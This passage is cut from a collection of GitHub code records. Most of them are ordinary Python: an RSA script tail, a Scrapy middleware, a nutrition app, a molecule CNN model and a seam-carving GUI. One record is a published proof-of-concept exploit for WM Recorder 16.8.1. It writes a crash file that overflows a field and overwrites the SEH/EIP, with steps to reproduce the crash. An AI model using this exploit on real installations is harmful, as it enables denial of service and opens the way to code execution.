272521153320973396417630511022295649383 333191769576802382347215159520488131299\n# d = 21192676109789010391262862485922983581960781531678874582696409324652745084161\n# output.txt = 8dd329d0374a924f4a0ae76371f41cfa07e68c4a087f4c0ff29d41ddb25ae4d230c10225c3745a007708f1958a2ffaef2b39bf106203c8eca790cf5d609ddefa3e6b97da17c9267b996d26bab106cbc9915e4edb2453715424e9ff7d3b26902b2366d0b1b90df6a07f1bac51674fcfac24724aae765ff6681def9ae837217b1e08f30b1eefa7afdb82eb152e0252fc5ab6dfa47578aba3484e1cf5af5bb4ef6caceaf11993fb1b60325114cbef63ba8e11d604dda57e73f48cb85f7f564b452b1a098dc616d60f38c4edd94f90aa637aa57d0eb7049e83ddbba2f066f414378cc0854649028db78fb5a4b8308e52a37671dc61a8c42de24f94ee878f01056c3db63ba3ba9b22a3abd74e644119bea59c487dd825dfabfdfa0ae9ab1682d802d1464f5a807df29f3d7b5ee9089ba8b20a6b7e306eb6038eb44aee36b8e1337a73bbfed649a2665ec3ed6066e0805ced5a09eb575528f06f1f8bc5001bb4fe1cc1c03d1e4d3ab45abf40f02f158da7ca71e17411b2863c9fb8f53ba0ce0ef23936\n# decrypted.txt = Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more. It is a tale told by an idiot, full of sound and fury, signifying nothing.\n\n\n# decrypted_hex: 4c69666527732062757420612077616c6b696e6720736861646f772c206120706f6f7220706c6179657220746861742073747275747320616e642066726574732068697320686f75722075706f6e2074686520737461676520616e64207468656e206973206865617264206e6f206d6f72652e20497420697320612074616c6520746f6c6420627920616e206964696f742c2066756c6c206f6620736f756e6420616e6420667572792c207369676e696679696e67206e6f7468696e672e0a0a\n# (0a = newline added from padding)\n","repo_name":"vmanja16/Security","sub_path":"RSA/rsa_manja.py","file_name":"rsa_manja.py","file_ext":"py","file_size_in_byte":10497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"35785619070","text":"from scrapy.http import HtmlResponse\nfrom scrapy.exceptions import IgnoreRequest\n\nclass HttpStatusMiddleware(object):\n\n    def process_response(self, request, response, spider):\n        http_status = response.status\n        url = request.url\n        # response.body is bytes, so the cache file must be opened in binary append mode\n        html_file = open('cache/' + url.replace('/','+').replace(':','+'), 'ab')\n        html_file.write(response.body)\n        html_file.flush()\n        html_file.close()\n        if http_status != 200:\n            raise IgnoreRequest(\"request_err\")\n        return response","repo_name":"Foreinyel/bodan","sub_path":"adagu_bodan/middlewares/http_status.py","file_name":"http_status.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"11306032731","text":"#coding = utf-8\n# note: this file is named optparse.py, which shadows the stdlib optparse module when run from its own directory\nimport optparse\nparser = optparse.OptionParser('usage: %prog -H <target host> -p <target port>')\nparser.add_option('-H', dest='tgtHost', type='string', help='specify target host')\nparser.add_option('-p', dest='tgtPort', type='int', help='specify target port')\n(options, args) = parser.parse_args()\ntgtHost = options.tgtHost\ntgtPort = options.tgtPort\nif (tgtHost is None) or (tgtPort is None):\n    print(parser.usage)\n    exit(0)\nelse:\n    print(tgtHost)\n    print(tgtPort)\n    \n","repo_name":"Markjunpro/Python","sub_path":"optparse.py","file_name":"optparse.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"34496331740","text":"import playground.utils as utils\nfrom playground.main import Playground\n\n\ndef main(args, parser, extra, subparser):\n    \"\"\"\n    playground deploy 
https://github.com/rse-ops/flux-tutorials radiuss-aws-2022\n    \"\"\"\n    utils.ensure_no_extra(extra)\n\n    cli = Playground(\n        args.repo,\n        quiet=args.quiet,\n        settings_file=args.settings_file,\n        backend=args.backend,\n    )\n\n    # Update config settings on the fly\n    cli.settings.update_params(args.config_params)\n\n    # Print the listing for this repository\n    cli.list()\n","repo_name":"converged-computing/playground","sub_path":"playground/client/listing.py","file_name":"listing.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"3079364360","text":"array = [3, 17, 18, 89, 227, 300]\r\nsearch_value = int(input(\"what are you searching for?\"))\r\n\r\n\r\n# linear search in python\r\ndef linear_search(array, search_value):\r\n    # Initialize a counter variable to keep track of the current index\r\n    index = 0\r\n    # Iterate through every element in the array:\r\n    for element in array:\r\n        # If we find the value we're looking for, we return its index:\r\n        if element == search_value:\r\n            return index\r\n        # If we reach an element that is greater than the value\r\n        # we're looking for, we can exit the loop early:\r\n        elif element > search_value:\r\n            break\r\n        # Increment the counter variable to move to the next index\r\n        index += 1\r\n    # We return None if we do not find the value within the array:\r\n    return None\r\n    \r\n\r\n\r\nresult = linear_search(array, search_value)\r\nprint(\"your element is at index\", result)\r\n","repo_name":"steadily-growing/DSA","sub_path":"week1/Algorithms_chapter2.py","file_name":"Algorithms_chapter2.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"69890888692","text":"import pymongo\r\nfrom pymongo import MongoClient\r\n\r\nfood_types = [\"protein\", \"carb\", \"fat\"]\r\n\r\n\r\ndef get_database():\r\n    connection_string = \"mongodb://127.0.0.1:27017/?directConnection=true&serverSelectionTimeoutMS=2000&appName=mongosh+1.5.0\"\r\n\r\n    client = MongoClient(connection_string)\r\n    return client[\"nutri\"]\r\n\r\n\r\nclass DailyCalories:\r\n    def __init__(self, protein, carb, fat):\r\n        self.protein = protein\r\n        self.carb = carb\r\n        self.fat = fat\r\n\r\n    def calculate_daily_calories(self):\r\n        return self.protein + self.carb + self.fat\r\n\r\n\r\nclass Measurement:\r\n    def __init__(self, weight, height):\r\n        self.weight = weight\r\n        self.height = height\r\n\r\n    def find_daily_calories_to_lose_weight(self):\r\n        if 150 < self.height < 170:\r\n            if 40 < self.weight < 60:\r\n                return 2000\r\n            elif 61 < self.weight < 80:\r\n                return 1800\r\n            elif 81 < self.weight < 100:\r\n                return 1600\r\n            elif self.weight > 100:\r\n                return 1400\r\n        elif 171 < self.height < 190:\r\n            if 40 < self.weight < 60:\r\n                return 2200\r\n            elif 61 < self.weight < 80:\r\n                return 2000\r\n            elif 81 < self.weight < 100:\r\n                return 1800\r\n            elif self.weight > 100:\r\n                return 1600\r\n        elif self.height >= 190:\r\n            if 40 < self.weight < 60:\r\n                return 2400\r\n            elif 61 < self.weight < 80:\r\n                return 2200\r\n            elif 81 < self.weight < 100:\r\n                return 2000\r\n            elif self.weight > 100:\r\n                return 1800\r\n\r\n\r\nclass AddUser(Measurement):\r\n    def __init__(self, weight, height, username):\r\n        super(AddUser, self).__init__(weight, height)\r\n        self.username = username\r\n\r\n    def insert_user(self):\r\n        item_1 = {\r\n            \"name\": self.username,\r\n            \"height\": self.height,\r\n            \"weight\": self.weight,\r\n        }\r\n        dbname = get_database()\r\n        
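# insert_many expects a list of documents, so the single user record is wrapped in a list\r\n        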
dbname.users.insert_many([item_1])\r\n\r\n\r\nuser1 = input(\"Enter your name\")\r\nweight1 = int(input(\"Enter your weight\"))\r\nheight1 = int(input(\"Enter your height\"))\r\ninfo = AddUser(username=user1, weight=weight1, height=height1)\r\n\r\nAddUser.insert_user(info)\r\n\r\n\r\nm1 = Measurement(weight1, height1)\r\n\r\ndailyCalories = Measurement.find_daily_calories_to_lose_weight(m1)\r\nprint(f\"Your will have daily {dailyCalories} calories\")\r\nprint(dailyCalories)\r\n\r\ndbname = get_database()\r\n\r\ncollection_name1 = dbname[\"protein\"]\r\ncollection_name2 = dbname[\"carb\"]\r\ncollection_name3 = dbname[\"fat\"]\r\n\r\ndetails = collection_name2.find()\r\n\r\nfor data in details:\r\n print(data)\r\n\r\n# while dailyCalories > 0:\r\n# for food in food_types:\r\n# if food == collection_name1:\r\n# a = dailyCalories - collection_name1.find(\"calories\")\r\n# print(a)\r\n\r\n\r\n\r\n","repo_name":"BerkAcikel45/iakademi-2022","sub_path":"ödev/nutrition duygu/nutritionapp.py","file_name":"nutritionapp.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"22507566645","text":"from cryptography.hazmat.primitives.serialization import load_pem_public_key\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef validate_body(body: dict, encrypted: bool = False):\n \"\"\"\n Used to validate the request body. This checks for the fields \\\n as well as the types to check that the body is correctly formatted.\n\n Parameters:\n body (dict): The request body that is to be validated\n encrypted (bool): Whether the request is for encrypted data\n Returns:\n errors (list): A list of errors that have been found\n \"\"\"\n expected_fields = {\n 'serums_id': int,\n 'tags': list,\n 'hospital_ids': list\n }\n\n errors = []\n\n for field in expected_fields:\n if field not in body:\n errors.append(f\"Missing required field: {field.upper()}\")\n if field in body and type(body[field]) != expected_fields[field]:\n errors.append(\n f\"Incorrect data type for {field.upper()}. \"\n f\"Expected {str(expected_fields[field])}. \"\n f\"Received {str(type(body[field]))}\")\n if encrypted:\n if 'public_key' not in body:\n errors.append(f\"Missing required field: PUBLIC_KEY\")\n if 'public_key' in body and type(body['public_key']) != str:\n errors.append(\n f\"Incorrect data type for PUBLIC_KEY. \"\n \"Expected str. 
Received {str(type(body['public_key']))}\")\n        if 'public_key' in body:\n            try:\n                public_key = body['public_key'].encode()\n                load_pem_public_key(\n                    public_key, backend=default_backend()\n                )\n            except ValueError:\n                errors.append(\n                    \"Public key incorrectly formatted\"\n                )\n    return errors\n","repo_name":"SkinnyPigeon/serums_api","sub_path":"components/validation/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"10068557413","text":"import math\nimport heapq\n\n\"\"\"\n    Here we will write our awesome algorithms\n\"\"\"\n\n\ndef manhattan_dist(p1, p2):\n    return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n\n\ndef euclidean_dist(p1, p2):\n    return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n\ndef get_neighbours(point, matrix):\n    res = []\n    for i in range(-1, 2):\n        for j in range(-1, 2):\n            y = point[0] + i\n            x = point[1] + j\n            if 0 <= x < len(matrix[0]) and 0 <= y < len(matrix) and (y, x) != point and matrix[y][x] != -1:\n                res.append((y, x))\n    return res\n\n\ndef get_path_length(paths, metric):\n    res_length = 0\n    for path in paths:\n        for i in range(1, len(path)):\n            res_length += metric(path[i - 1], path[i])\n    return res_length\n\n\ndef astar(matrix, start, end, metric):\n    # start is a (y, x) tuple, so the visited set must contain the tuple itself\n    visited = {start}\n    candidates = []\n    heapq.heapify(candidates)\n    heapq.heappush(candidates, (metric(start, end), (0, [[start]])))\n    while len(candidates) > 0:\n        f_prev, (g_prev, curr_path) = heapq.heappop(candidates)\n        curr_point = curr_path[-1][-1]\n        if curr_point in visited:\n            continue\n        if curr_point == end:\n            return curr_path, get_path_length(curr_path, metric)\n        visited.add(curr_point)\n\n        neighbours = [p for p in get_neighbours(curr_point, matrix) if p not in visited]\n        for neighbour in neighbours:\n            (y, x) = neighbour\n            neighbour_val = matrix[y][x]\n            g = g_prev + metric(curr_point, neighbour)\n            new_path = [row[:] for row in curr_path]\n            new_path[-1].append(neighbour)\n            # Portal case:\n            if isinstance(neighbour_val, list):\n                [i, j] = neighbour_val\n                f = g + metric([i, j], end)\n                new_path.append([(i, j)])\n                heapq.heappush(candidates, (f, (g, new_path)))\n            # Point case:\n            else:\n                f = (g + metric(neighbour, end)) * neighbour_val\n                heapq.heappush(candidates, (f, (g, new_path)))\n    return None, None\n\n\ndef best_first(matrix, start, end, metric):\n    # same fix as in astar: keep the start tuple itself in the visited set\n    visited = {start}\n    candidates = []\n    heapq.heapify(candidates)\n    heapq.heappush(candidates, (metric(start, end), [[start]]))\n    while len(candidates) > 0:\n        f_prev, curr_path = heapq.heappop(candidates)\n        curr_point = curr_path[-1][-1]\n        if curr_point in visited:\n            continue\n        if curr_point == end:\n            return curr_path, get_path_length(curr_path, metric)\n        visited.add(curr_point)\n\n        neighbours = [p for p in get_neighbours(curr_point, matrix) if p not in visited]\n        for neighbour in neighbours:\n            (y, x) = neighbour\n            neighbour_val = matrix[y][x]\n            new_path = [row[:] for row in curr_path]\n            new_path[-1].append(neighbour)\n            # Portal case:\n            if isinstance(neighbour_val, list):\n                [i, j] = neighbour_val\n                f = metric((i, j), end)\n                new_path.append([(i, j)])\n                heapq.heappush(candidates, (f, new_path))\n            # Point case:\n            else:\n                f = metric(neighbour, end) * neighbour_val\n                heapq.heappush(candidates, (f, new_path))\n    return None, None\n\n\ndef Dijkstra(matrix, start, end, metric=manhattan_dist):\n    distances = {start: 0}\n    visited = set()\n    prev = {}\n    candidates = []\n    heapq.heapify(candidates)\n    heapq.heappush(candidates, (0, start))\n\n    while end not 
in distances:\n (curr_node_dist, curr_node) = heapq.heappop(candidates)\n if curr_node in visited:\n continue\n neighbours = get_neighbours(curr_node, matrix)\n visited.add(curr_node)\n for neighbour in neighbours:\n (y, x) = neighbour\n neighbour_val = matrix[y][x]\n alt_dist = metric(curr_node, neighbour) + curr_node_dist\n # Portal case:\n if isinstance(neighbour_val, list):\n neighbour_tuple = tuple(neighbour_val)\n if ((neighbour_tuple not in distances) or neighbour_tuple in distances and alt_dist < distances[\n neighbour_tuple]) \\\n or ((neighbour not in distances) or neighbour in distances and alt_dist < distances[neighbour]):\n distances[neighbour_tuple] = alt_dist\n distances[neighbour] = alt_dist\n prev[neighbour_tuple] = (curr_node, neighbour, alt_dist)\n prev[neighbour] = (curr_node, neighbour_tuple, alt_dist)\n # heapq.heappush(candidates, (alt_dist, neighbour))\n heapq.heappush(candidates, (distances[neighbour_tuple], neighbour_tuple))\n # Point case:\n else:\n alt_dist *= neighbour_val\n if (neighbour not in distances) or neighbour in distances and alt_dist < distances[neighbour]:\n distances[neighbour] = alt_dist\n prev[neighbour] = (curr_node, None, alt_dist)\n heapq.heappush(candidates, (distances[neighbour], neighbour))\n paths = []\n curr_path = [end]\n curr_node = end\n path_dist = distances[end]\n prev_portal = False\n while curr_node != start:\n (prev_node, portal_node, dist) = prev[curr_node]\n if portal_node and not prev_portal:\n paths.append(curr_path)\n curr_path = [portal_node]\n prev_node = portal_node\n prev_portal = True\n else:\n curr_path = [prev_node] + curr_path\n if prev_portal:\n prev_portal = False\n curr_node = prev_node\n paths.append(curr_path)\n paths.reverse()\n for path in paths:\n path.reverse()\n return paths, path_dist\n","repo_name":"Fronox/alg-project-backend","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31251912076","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 17 11:10:02 2019\r\n\r\n@author: jjohns\r\n\"\"\"\r\n\r\nimport numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\r\nimport os\r\nimport openbabel as ob\r\nimport multiprocessing as mp\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n#SKlearn Libraries\r\nfrom sklearn.linear_model import Lasso\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import RobustScaler\r\nfrom sklearn.metrics import mean_squared_error\r\nimport xgboost as xgb\r\nfrom sklearn.model_selection import KFold, cross_val_score, train_test_split\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nimport mol_image_3D as mi3D\r\n\r\nn_folds = 5  # number of cross-validation folds; assumed value, adjust as needed\r\n\r\n#%% Functions Used in models\r\ndef rmsle_cv(model, dataset,y):\r\n    \"\"\"\r\n    Returns the log of the cross-validated mean absolute error for each fold\r\n    \"\"\"\r\n    kf = KFold(n_folds, shuffle=True, random_state=42).get_n_splits(dataset)\r\n    rmse= np.log(-cross_val_score(model, dataset, y, scoring=\"neg_mean_absolute_error\", cv = kf))\r\n    return(rmse)\r\n    \r\n\r\ndef find_path2(mol,atom0_index,atom1_index):\r\n    \"\"\"\r\n    Find the path between 2 atoms separated by 1 atom\r\n    \"\"\"\r\n    atom0_index = atom0_index+1\r\n    atom1_index = atom1_index+1\r\n    atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom0_index))\r\n    alist=[]\r\n    \r\n    index=0\r\n    for a in atom_iter:\r\n        alist.append(a.GetIdx())\r\n        index=index+1\r\n    #print('The list of bound atoms is:', alist)\r\n    index=0\r\n    depth=0\r\n    finished=False\r\n    for atom_index in alist:\r\n        path=atom_index\r\n        atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom_index))\r\n        for a in atom_iter:\r\n            #print(a.GetIdx())\r\n            if a.GetIdx() ==atom1_index:\r\n                finished=True\r\n                break\r\n            \r\n        if finished:\r\n            break\r\n    if not finished:\r\n        #print('Unable to find a path between atoms',atom0_index-1,' and ',atom1_index-1,'with a depth of 2')\r\n        return -1\r\n    path=path-1\r\n    return path\r\n\r\ndef find_path3(mol,atom0_index,atom1_index):\r\n    atom0_index = atom0_index+1\r\n    atom1_index = atom1_index+1\r\n    atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom0_index))\r\n    alist=[]\r\n    \r\n    path=[0 ,0]\r\n    index=0\r\n    for a in atom_iter:\r\n        alist.append(a.GetIdx())\r\n    #print('The list of atoms bound to[',atom0_index,']is:', alist)\r\n    index=0\r\n    depth=0\r\n    finished=False\r\n    for atom_index in alist:\r\n        path[0]=atom_index\r\n        atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom_index))\r\n        alist2=[]\r\n        for a in atom_iter:\r\n            alist2.append(a.GetIdx())\r\n        #print('The atoms connected to atom',path[0],'are:', alist2)    \r\n        for atom_index2 in alist2:\r\n            path[1]=atom_index2\r\n            atom_iter2=ob.OBAtomAtomIter(mol.GetAtom(atom_index2))\r\n            #print('The atoms connected to',path[1],'are:')\r\n            for a2 in atom_iter2:\r\n                #print(a2.GetIdx())\r\n                if a2.GetIdx() ==atom1_index:\r\n                    finished=True\r\n                    break\r\n            if finished: \r\n                break\r\n        if finished:\r\n            break\r\n    if not finished:\r\n        print('Unable to find a path between atoms',atom0_index-1,' and ',atom1_index-1,'with a depth of 3')\r\n        return [-1,-1]\r\n    path[0]=path[0]-1\r\n    path[1]=path[1]-1\r\n    return path\r\n\r\n#%% Learning 1JHN\r\ndef Learn1JHN_CNN(train1JHN, model,fname, file_io='read', path=\"X:\\\\CHAMPS\\\\\"):\r\n    if file_io=='write':\r\n        OBConversion=ob.OBConversion()\r\n        OBConversion.SetInFormat(\"xyz\")\r\n        print(len(train1JHN))\r\n        for index in range(0,len(train1JHN)):\r\n            mol=ob.OBMol()\r\n            mol_name=train1JHN.iloc[index]['molecule_name'] +'.xyz'\r\n            OBConversion.ReadFile(mol,mol_name)\r\n            if mol.GetAtom(train1JHN.iloc[index]['atom_index_0'].item()+1).IsNitrogen():\r\n                A=train1JHN.iloc[index]['atom_index_0'].item()+1\r\n                B=train1JHN.iloc[index]['atom_index_1'].item()+1\r\n            else:\r\n                
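# otherwise the nitrogen is atom_index_1, so the two indices swap roles\r\n                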
A=train1JHN.iloc[index]['atom_index_1'].item()+1\r\n B=train1JHN.iloc[index]['atom_index_0'].item()+1\r\n if index==0:\r\n X=mi3D.make_conv_input(mol,A,B)\r\n X=X.reshape((1,64,64,64,2))\r\n print(X.shape)\r\n else:\r\n tmp=mi3D.make_conv_input(mol,A,B)\r\n X=np.append(X,tmp.reshape(1,64,64,64,2),axis=0)\r\n print(X.shape)\r\n if index % 32 ==0:\r\n print('Molecules 1 - {} made into images'.format(index))\r\n print('index = {}, fname = {}, file = {}, path = {}'.format(index, fname, file_io, path))\r\n np.save(path+fname,X)\r\n else:\r\n X=np.load(path+fname+\".npy\")\r\n print('X loaded successfully')\r\n# X=(X-np.mean(X))/(np.std(X))\r\n Y=np.array(train1JHN['scalar_coupling_constant'].reset_index(drop=True))\r\n Y=Y.reshape((1,len(train1JHN)))\r\n# print(X.shape)\r\n# model=keras.Sequential([\r\n# keras.layers.Dense(256,activation=tf.nn.tanh,input_shape=(64*64*64+6,), kernel_initializer=keras.initializers.he_normal()),\r\n# keras.layers.Dense(128,activation=tf.nn.tanh,kernel_initializer=keras.initializers.he_normal()),\r\n# keras.layers.Dense(16,activation=tf.nn.tanh,kernel_initializer=keras.initializers.he_normal()),\r\n# keras.layers.Dense(1,activation=tf.nn.relu,kernel_initializer=keras.initializers.he_normal())])\r\n \r\n \r\n history=model.fit(X,Y.T,epochs=1, batch_size=32, verbose=2)\r\n# plt.plot(history.history['mean_absolute_error'])\r\n# plt.show()\r\n \r\n return history, model,X\r\n\r\ndef train_1JHN(train, num_epochs=10,batch_size=128,width=64,height=64,depth=64,nchannel=2, pre_load=False):\r\n \r\n \r\n num_minibatches=len(train)//batch_size\r\n J=[]\r\n model=tf.keras.models.Sequential()\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3), activation=tf.nn.relu, input_shape=(height,width,depth,2)))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3),activation=tf.nn.relu))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3),activation=tf.nn.relu))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3),activation=tf.nn.relu))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Flatten())\r\n model.add(tf.keras.layers.Dense(512,activation=tf.nn.relu))\r\n model.add(tf.keras.layers.Dense(128,activation=tf.nn.relu))\r\n# model.add(tf.keras.layers.Dense(32,activation=tf.nn.relu))\r\n model.add(tf.keras.layers.Dense(1,activation=tf.keras.activations.linear))\r\n model.compile(optimizer='adam', loss='mean_absolute_error',\r\n metrics=['mean_absolute_error'])\r\n model.summary()\r\n os.chdir('structures')\r\n print('Summary over')\r\n for epoch_number in range(num_epochs):\r\n start=time.time()\r\n for batch_number in range(num_minibatches):\r\n if (epoch_number ==0) and (not pre_load):\r\n history,model,X=Learn1JHN_CNN(train.iloc[batch_number*batch_size : (batch_number+1)*batch_size],model,fname='1JHN'+str(batch_number),file_io='write')\r\n else:\r\n history,model,X=Learn1JHN_CNN(train.iloc[batch_number*batch_size : (batch_number+1)*batch_size],model,fname='1JHN'+str(batch_number),file_io='read')\r\n print('Minibatch # {}'.format(batch_number+1))\r\n J.append(history.history['mean_absolute_error'])\r\n if batch_number % 2 ==0:\r\n plt.plot(J)\r\n plt.show()\r\n print('Functional Time to do 5 minibatches is {}'.format(time.time()-start))\r\n print('Finishing epoch number {}'.format(epoch_number))\r\n 
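# step back out of the structures/ directory before returning the trained model\r\n    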
os.chdir('..\\\\')\r\n    return model, J","repo_name":"JEJohnsChem/1JHN_NN","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"32577312558","text":"#!/usr/bin/python\n\n#\n# Exploit Author: bzyo\n# Twitter: @bzyo_\n# Exploit Title: WM Recorder 16.8.1 - Denial of Service\n# Date: 03-20-2018\n# Vulnerable Software: WM Recorder 16.8.1\n# Vendor Homepage: http://wmrecorder.com/home/\n# Version: 16.8.1\n# Software Link: http://wmrecorder.com/download/wm-recorder/\n# Tested On: Windows 7 x86/x64, Windows 10 x64\n#\n#\n# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,\n# change End Recording date to future date, turn scheduler on, select OK\n#\n# app crashes & EIP overwrite;\n# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh\n# lots of bad chars including \\\\x90\n#\n\nfilename=\"crash.txt\"\n\njunk = \"\\\\x41\"*429\n\nnseh = \"\\\\x42\"*4\n\nseh = \"\\\\x43\"*4\n\nfill = \"\\\\x44\"*9562\n\nbuffer = junk + nseh + seh + fill\n\ntextfile = open(filename , 'w')\ntextfile.write(buffer)\ntextfile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/44333.py","file_name":"44333.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"}
{"seq_id":"22698513606","text":"types_of_people = 10\nx = f\"There are {types_of_people} types of people.\" #f-string\n\nbinary = \"binary\"\ndo_not = \"don't\"\ny = f\"Those who know {binary} and those who {do_not}.\" # f-string containing two variables\n\nprint(x)\nprint(y)\n\nprint(f\"I said: {x}\") # an f-string nested inside another f-string\nprint(f\"I also said: '{y}'\") # single quotes inside an f-string still print correctly\n\nhilarious = False\nJoke_evaluation = \"Isn't that joke so funny?! 
{}\" #预留显示变量的位置{}\n\nprint(Joke_evaluation.format(hilarious)) #使用format函数填上预留位置{};逻辑值直接显示为False\n\nw = \"This is the left side of ...\"\ne = \"a string with a right side.\"\n\nprint(w + e)\n","repo_name":"BettyChen0616/LearnPython-the-HardWay-220213","sub_path":"ex6_format.py","file_name":"ex6_format.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37312436165","text":"import tkinter as tk\nimport customtkinter as ctk\nfrom tkinter import filedialog as fd\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\nfrom PIL import Image, ImageTk\n\nimport seamcarver as sc\n\n#Appearance\nctk.set_appearance_mode(\"dark\")\nctk.set_default_color_theme(\"green\")\n\n# Create the main window\nroot = ctk.CTk()\n\n# Set the window size\nroot.geometry(\"515x190\")\nroot.resizable(False, False)\n\nroot.iconbitmap(\"icon.ico\")\n\nroot.title('Seam Carving')\n\n#Frame for the seam carver---------------------------------------------------------------\nscframe = ctk.CTkFrame(root, \n width = 280, \n height = 400, \n border_width = 2)\nscframe.grid()\nscframe.grid_propagate(False)\n\ninputlabel = ctk.CTkLabel(scframe, text = \"Enter the path to the image:\")\ninputlabel.pack(padx = 2, pady = 2)\n\ninputdialog = ctk.CTkLabel(scframe, text = \"Filepath: \", \n width = 250, \n height = 10,\n anchor = \"w\",\n compound = \"left\")\ninputdialog.pack(padx = 2, pady = 2)\n\ntemp = ctk.CTkLabel(scframe, text = \"Empty\")\n\ndef open_file():\n filetypes = (\n (\"PNG files\", \"*.png\"), \n (\"All files\", \"*.*\")\n )\n filename = fd.askopenfilename(\n title = \"Open a PNG file\",\n initialdir = \"/\",\n filetypes = filetypes\n )\n if(len(filename)>27):\n inputdialog.configure(text = \"Filepath: \" + filename[:28] + \"[...]\")\n else:\n inputdialog.configure(text = \"Filepath: \" + filename)\n temp.configure(text = filename)\n return filename\n\n\n\nopen_button = ctk.CTkButton(\n scframe,\n text = \"Open Image\",\n command = open_file\n)\nopen_button.pack(expand=True)\n\ncarvelabel = ctk.CTkLabel(scframe, text = \"Input number of seams to be carved:\")\ncarvelabel.pack(padx = 2, pady = 2)\n\n\ndef carve():\n global entry\n string = entry.get()\n print(\"Carving...\")\n if(temp.cget(\"text\") == \"Empty\"):\n showinfo(title = \"Error\", message = \"Please select an image to carve.\")\n else:\n sc.main(temp.cget(\"text\"), int(string))\n\nentry = ctk.CTkEntry(scframe)\nentry.focus_set()\nentry.pack(padx = 2, pady = 2)\n\n\ncarvebutton = ctk.CTkButton(scframe, text = \"Carve\", command = carve)\ncarvebutton.pack(padx = 2, pady = 2)\n\n#Frame for the model---------------------------------------------------------------\nmodelframe = ctk.CTkFrame(root, \n width = 280, \n height = 400, \n border_width = 2)\nmodelframe.grid(column = 1, row = 0, padx = 5)\nmodelframe.grid_propagate(False)\n\nmodelinputlabel = ctk.CTkLabel(modelframe, text = \"Enter the path to the image:\")\nmodelinputlabel.pack(padx = 2, pady = 2)\n\nmodelinputdialog = ctk.CTkLabel(modelframe, text = \"Filepath: \", \n width = 250, \n height = 10,\n anchor = \"w\",\n compound = \"left\")\nmodelinputdialog.pack(padx = 2, pady = 2)\n\nmodeltemp = ctk.CTkLabel(modelframe, text = \"Empty\")\n\ndef open_model():\n filetypes = (\n (\"Model files\", \"*.mdl\"), \n (\"All files\", \"*.*\")\n )\n modelfilename = fd.askopenfilename(\n title = \"Open a Model\",\n initialdir = \"/\",\n filetypes = filetypes\n )\n if(len(modelfilename)>27):\n 
modelinputdialog.configure(text = \"Modelpath: \" + modelfilename[:28] + \"[...]\")\n else:\n modelinputdialog.configure(text = \"Modelpath: \" + modelfilename)\n modeltemp.configure(text = modelfilename)\n return modelfilename\n\n\nopen_model_button = ctk.CTkButton(\n modelframe,\n text = \"Open model\",\n command = open_model\n)\nopen_model_button.pack(expand=True)\n\nmodellabel = ctk.CTkLabel(modelframe, text = \"Enter the path to the image:\")\nmodellabel.pack(padx = 2, pady = 2)\n\nmodelimageinputdialog = ctk.CTkLabel(modelframe, text = \"Filepath: \", \n width = 250, \n height = 10,\n anchor = \"w\",\n compound = \"left\")\nmodelimageinputdialog.pack(padx = 2, pady = 2)\n\nmodelimagetemp = ctk.CTkLabel(modelframe, text = \"Empty\")\n\ndef open_modelimage():\n filetypes = (\n (\"Image files\", \"*.png\"), \n (\"All files\", \"*.*\")\n )\n modelimagefilename = fd.askopenfilename(\n title = \"Open an Image\",\n initialdir = \"/\",\n filetypes = filetypes\n )\n if(len(modelimagefilename)>27):\n 